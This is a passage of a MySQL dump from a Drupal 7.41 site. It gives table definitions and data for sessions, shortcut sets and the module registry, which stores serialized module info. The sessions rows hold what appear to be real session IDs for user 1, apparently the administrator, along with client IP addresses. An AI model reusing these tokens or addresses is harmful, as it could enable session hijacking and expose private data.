LOCK TABLES `sequences` WRITE; /*!40000 ALTER TABLE `sequences` DISABLE KEYS */; INSERT INTO `sequences` VALUES (16); /*!40000 ALTER TABLE `sequences` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `sessions` -- DROP TABLE IF EXISTS `sessions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `sessions` ( `uid` int(10) unsigned NOT NULL COMMENT 'The users.uid corresponding to a session, or 0 for anonymous user.', `sid` varchar(128) NOT NULL COMMENT 'A session ID. The value is generated by Drupal’s session handlers.', `ssid` varchar(128) NOT NULL DEFAULT '' COMMENT 'Secure session ID. The value is generated by Drupal’s session handlers.', `hostname` varchar(128) NOT NULL DEFAULT '' COMMENT 'The IP address that last used this session ID (sid).', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when this session last requested a page. Old records are purged by PHP automatically.', `cache` int(11) NOT NULL DEFAULT '0' COMMENT 'The time of this user’s last post. This is used when the site has specified a minimum_cache_lifetime. See cache_get().', `session` longblob COMMENT 'The serialized contents of $_SESSION, an array of name/value pairs that persists across page requests by this session ID. Drupal loads $_SESSION from here at the start of each request and saves it at the end.', PRIMARY KEY (`sid`,`ssid`), KEY `timestamp` (`timestamp`), KEY `uid` (`uid`), KEY `ssid` (`ssid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Drupal’s session handlers read and write into the...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `sessions` -- LOCK TABLES `sessions` WRITE; /*!40000 ALTER TABLE `sessions` DISABLE KEYS */; INSERT INTO `sessions` VALUES (1,'2rCMYKGQFXBSeSZj8fVFpoTY3X10_4YZ6mb5vhO6OyM','2rCMYKGQFXBSeSZj8fVFpoTY3X10_4YZ6mb5vhO6OyM','185.66.194.22',1447352384,0,''),(1,'OhHYwGRN0WtSYjwgfy38LPSFV6YlyDEgrRwab8tl6VY','OhHYwGRN0WtSYjwgfy38LPSFV6YlyDEgrRwab8tl6VY','195.128.40.90',1449485769,0,''),(1,'q_i4YMYuavZMHZiMBOca2NAdkQATahd9Ym-KcY0y7Ng','q_i4YMYuavZMHZiMBOca2NAdkQATahd9Ym-KcY0y7Ng','195.128.40.90',1445600097,0,''),(1,'t95wNcuDnyF18cU2ds8rQrh6TToBtrCxBcLGwk4lmwc','t95wNcuDnyF18cU2ds8rQrh6TToBtrCxBcLGwk4lmwc','5.147.41.205',1446302719,0,'batches|a:1:{i:16;b:1;}updates_remaining|a:0:{}'),(1,'tlFUxUvr6mQsGparS5nKszoFEONNv72zW-ezOfAoI9E','tlFUxUvr6mQsGparS5nKszoFEONNv72zW-ezOfAoI9E','5.147.41.205',1449694804,0,''),(1,'XBBZYn64UX1cIZH8BqjTNe0FqBnP6a-PaWZkhjnxZoc','XBBZYn64UX1cIZH8BqjTNe0FqBnP6a-PaWZkhjnxZoc','194.99.144.7',1448298125,0,''); /*!40000 ALTER TABLE `sessions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `shortcut_set` -- DROP TABLE IF EXISTS `shortcut_set`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `shortcut_set` ( `set_name` varchar(32) NOT NULL DEFAULT '' COMMENT 'Primary Key: The menu_links.menu_name under which the set’s links are stored.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'The title of the set.', PRIMARY KEY (`set_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores information about sets of shortcuts links.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `shortcut_set` -- LOCK TABLES `shortcut_set` WRITE; /*!40000 ALTER TABLE `shortcut_set` DISABLE KEYS */; INSERT INTO `shortcut_set` VALUES ('shortcut-set-1','Default'); /*!40000 ALTER TABLE `shortcut_set` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `shortcut_set_users` -- DROP TABLE IF EXISTS `shortcut_set_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `shortcut_set_users` ( `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The users.uid for this set.', `set_name` varchar(32) NOT NULL DEFAULT '' COMMENT 'The shortcut_set.set_name that will be displayed for this user.', PRIMARY KEY (`uid`), KEY `set_name` (`set_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maps users to shortcut sets.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `shortcut_set_users` -- LOCK TABLES `shortcut_set_users` WRITE; /*!40000 ALTER TABLE `shortcut_set_users` DISABLE KEYS */; /*!40000 ALTER TABLE `shortcut_set_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `system` -- DROP TABLE IF EXISTS `system`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `system` ( `filename` varchar(255) NOT NULL DEFAULT '' COMMENT 'The path of the primary file for this item, relative to the Drupal root; e.g. modules/node/node.module.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the item; e.g. node.', `type` varchar(12) NOT NULL DEFAULT '' COMMENT 'The type of the item, either module, theme, or theme_engine.', `owner` varchar(255) NOT NULL DEFAULT '' COMMENT 'A theme’s ’parent’ . Can be either a theme or an engine.', `status` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether or not this item is enabled.', `bootstrap` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether this module is loaded during Drupal’s early bootstrapping phase (e.g. even before the page cache is consulted).', `schema_version` smallint(6) NOT NULL DEFAULT '-1' COMMENT 'The module’s database schema version number. -1 if the module is not installed (its tables do not exist); 0 or the largest N of the module’s hook_update_N() function that has either been run or existed when the module was first installed.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The order in which this module’s hooks should be invoked relative to other modules. Equal-weighted modules are ordered by name.', `info` blob COMMENT 'A serialized array containing information from the module’s .info file; keys can include name, description, package, version, core, dependencies, and php.', PRIMARY KEY (`filename`), KEY `system_list` (`status`,`bootstrap`,`type`,`weight`,`name`), KEY `type_name` (`type`,`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='A list of all modules, themes, and theme engines that are...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `system` -- LOCK TABLES `system` WRITE; /*!40000 ALTER TABLE `system` DISABLE KEYS */; INSERT INTO `system` VALUES ('modules/aggregator/aggregator.module','aggregator','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:10:\"Aggregator\";s:11:\"description\";s:57:\"Aggregates syndicated content (RSS, RDF, and Atom feeds).\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"aggregator.test\";}s:9:\"configure\";s:41:\"admin/config/services/aggregator/settings\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:14:\"aggregator.css\";s:33:\"modules/aggregator/aggregator.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/aggregator/tests/aggregator_test.module','aggregator_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:23:\"Aggregator module tests\";s:11:\"description\";s:46:\"Support module for aggregator related testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/block/block.module','block','module','',1,0,7009,-5,'a:13:{s:4:\"name\";s:5:\"Block\";s:11:\"description\";s:140:\"Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"block.test\";}s:9:\"configure\";s:21:\"admin/structure/block\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/block/tests/block_test.module','block_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Block test\";s:11:\"description\";s:21:\"Provides test blocks.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/blog/blog.module','blog','module','',1,0,0,0,'a:12:{s:4:\"name\";s:4:\"Blog\";s:11:\"description\";s:25:\"Enables multi-user blogs.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"blog.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/book/book.module','book','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:4:\"Book\";s:11:\"description\";s:66:\"Allows users to create and organize related content in an outline.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"book.test\";}s:9:\"configure\";s:27:\"admin/content/book/settings\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"book.css\";s:21:\"modules/book/book.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/color/color.module','color','module','',1,0,7001,0,'a:12:{s:4:\"name\";s:5:\"Color\";s:11:\"description\";s:70:\"Allows administrators to change the color scheme of compatible themes.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"color.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/comment/comment.module','comment','module','',1,0,7009,0,'a:14:{s:4:\"name\";s:7:\"Comment\";s:11:\"description\";s:57:\"Allows users to comment on and discuss published content.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:4:\"text\";}s:5:\"files\";a:2:{i:0;s:14:\"comment.module\";i:1;s:12:\"comment.test\";}s:9:\"configure\";s:21:\"admin/content/comment\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:11:\"comment.css\";s:27:\"modules/comment/comment.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/contact/contact.module','contact','module','',1,0,7003,0,'a:13:{s:4:\"name\";s:7:\"Contact\";s:11:\"description\";s:61:\"Enables the use of both personal and site-wide contact forms.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"contact.test\";}s:9:\"configure\";s:23:\"admin/structure/contact\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/contextual/contextual.module','contextual','module','',1,0,0,0,'a:12:{s:4:\"name\";s:16:\"Contextual links\";s:11:\"description\";s:75:\"Provides contextual links to perform actions related to elements on a page.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:15:\"contextual.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/dashboard/dashboard.module','dashboard','module','',1,0,0,0,'a:13:{s:4:\"name\";s:9:\"Dashboard\";s:11:\"description\";s:136:\"Provides a dashboard page in the administrative interface for organizing administrative tasks and tracking information within your site.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:5:\"files\";a:1:{i:0;s:14:\"dashboard.test\";}s:12:\"dependencies\";a:1:{i:0;s:5:\"block\";}s:9:\"configure\";s:25:\"admin/dashboard/customize\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/dblog/dblog.module','dblog','module','',1,1,7002,0,'a:12:{s:4:\"name\";s:16:\"Database logging\";s:11:\"description\";s:47:\"Logs and records system events to the database.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"dblog.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/field.module','field','module','',1,0,7003,0,'a:14:{s:4:\"name\";s:5:\"Field\";s:11:\"description\";s:57:\"Field API to add fields to entities like nodes and users.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:4:{i:0;s:12:\"field.module\";i:1;s:16:\"field.attach.inc\";i:2;s:20:\"field.info.class.inc\";i:3;s:16:\"tests/field.test\";}s:12:\"dependencies\";a:1:{i:0;s:17:\"field_sql_storage\";}s:8:\"required\";b:1;s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:15:\"theme/field.css\";s:29:\"modules/field/theme/field.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/field_sql_storage/field_sql_storage.module','field_sql_storage','module','',1,0,7002,0,'a:13:{s:4:\"name\";s:17:\"Field SQL storage\";s:11:\"description\";s:37:\"Stores field data in an SQL database.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:22:\"field_sql_storage.test\";}s:8:\"required\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/list/list.module','list','module','',1,0,7002,0,'a:12:{s:4:\"name\";s:4:\"List\";s:11:\"description\";s:69:\"Defines list field types. Use with Options to create selection lists.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:2:{i:0;s:5:\"field\";i:1;s:7:\"options\";}s:5:\"files\";a:1:{i:0;s:15:\"tests/list.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/list/tests/list_test.module','list_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:9:\"List test\";s:11:\"description\";s:41:\"Support module for the List module tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/field/modules/number/number.module','number','module','',1,0,0,0,'a:12:{s:4:\"name\";s:6:\"Number\";s:11:\"description\";s:28:\"Defines numeric field types.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:11:\"number.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/options/options.module','options','module','',1,0,0,0,'a:12:{s:4:\"name\";s:7:\"Options\";s:11:\"description\";s:82:\"Defines selection, check box and radio button widgets for text and numeric fields.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:12:\"options.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field/modules/text/text.module','text','module','',1,0,7000,0,'a:14:{s:4:\"name\";s:4:\"Text\";s:11:\"description\";s:32:\"Defines simple text field types.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:9:\"text.test\";}s:8:\"required\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}'),('modules/field/tests/field_test.module','field_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:14:\"Field API Test\";s:11:\"description\";s:39:\"Support module for the Field API tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:5:\"files\";a:1:{i:0;s:21:\"field_test.entity.inc\";}s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/field_ui/field_ui.module','field_ui','module','',1,0,0,0,'a:12:{s:4:\"name\";s:8:\"Field UI\";s:11:\"description\";s:33:\"User interface for the Field API.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:13:\"field_ui.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/file/file.module','file','module','',1,0,0,0,'a:12:{s:4:\"name\";s:4:\"File\";s:11:\"description\";s:26:\"Defines a file field type.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:5:\"field\";}s:5:\"files\";a:1:{i:0;s:15:\"tests/file.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/file/tests/file_module_test.module','file_module_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:9:\"File test\";s:11:\"description\";s:53:\"Provides hooks for testing File module functionality.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/filter/filter.module','filter','module','',1,0,7010,0,'a:14:{s:4:\"name\";s:6:\"Filter\";s:11:\"description\";s:43:\"Filters content in preparation for display.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"filter.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:28:\"admin/config/content/formats\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/forum/forum.module','forum','module','',0,0,-1,0,'a:14:{s:4:\"name\";s:5:\"Forum\";s:11:\"description\";s:27:\"Provides discussion forums.\";s:12:\"dependencies\";a:2:{i:0;s:8:\"taxonomy\";i:1;s:7:\"comment\";}s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"forum.test\";}s:9:\"configure\";s:21:\"admin/structure/forum\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:9:\"forum.css\";s:23:\"modules/forum/forum.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/help/help.module','help','module','',1,0,0,0,'a:12:{s:4:\"name\";s:4:\"Help\";s:11:\"description\";s:35:\"Manages the display of online help.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"help.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/image/image.module','image','module','',1,0,7005,0,'a:15:{s:4:\"name\";s:5:\"Image\";s:11:\"description\";s:34:\"Provides image manipulation tools.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:4:\"file\";}s:5:\"files\";a:1:{i:0;s:10:\"image.test\";}s:9:\"configure\";s:31:\"admin/config/media/image-styles\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;s:8:\"required\";b:1;s:11:\"explanation\";s:80:\"Field type(s) in use - see Field list\";}'),('modules/image/tests/image_module_test.module','image_module_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:10:\"Image test\";s:11:\"description\";s:69:\"Provides hook implementations for testing Image module functionality.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:24:\"image_module_test.module\";}s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/locale/locale.module','locale','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:6:\"Locale\";s:11:\"description\";s:119:\"Adds language handling functionality and enables the translation of the user interface to languages other than English.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:11:\"locale.test\";}s:9:\"configure\";s:30:\"admin/config/regional/language\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/locale/tests/locale_test.module','locale_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:11:\"Locale Test\";s:11:\"description\";s:42:\"Support module for the locale layer tests.\";s:4:\"core\";s:3:\"7.x\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/menu/menu.module','menu','module','',1,0,7003,0,'a:13:{s:4:\"name\";s:4:\"Menu\";s:11:\"description\";s:60:\"Allows administrators to customize the site navigation menu.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"menu.test\";}s:9:\"configure\";s:20:\"admin/structure/menu\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/node/node.module','node','module','',1,0,7015,0,'a:15:{s:4:\"name\";s:4:\"Node\";s:11:\"description\";s:66:\"Allows content to be submitted to the site and displayed on pages.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:2:{i:0;s:11:\"node.module\";i:1;s:9:\"node.test\";}s:8:\"required\";b:1;s:9:\"configure\";s:21:\"admin/structure/types\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:8:\"node.css\";s:21:\"modules/node/node.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}'),('modules/node/tests/node_access_test.module','node_access_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:24:\"Node module access tests\";s:11:\"description\";s:43:\"Support module for node permission testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/node/tests/node_test.module','node_test','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:17:\"Node module tests\";s:11:\"description\";s:40:\"Support module for node related testing.\";s:7:\"package\";s:7:\"Testing\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:6:\"hidden\";b:1;s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:5:\"files\";a:0:{}s:9:\"bootstrap\";i:0;}'),('modules/node/tests/node_test_exception.module','node_test_exception','module','',0,0,-1,0,'a:13:{s:4:\"name\";s:27:\"Node module exception tests\";s:11:\"description\";s:50:\"Support module for node related exception 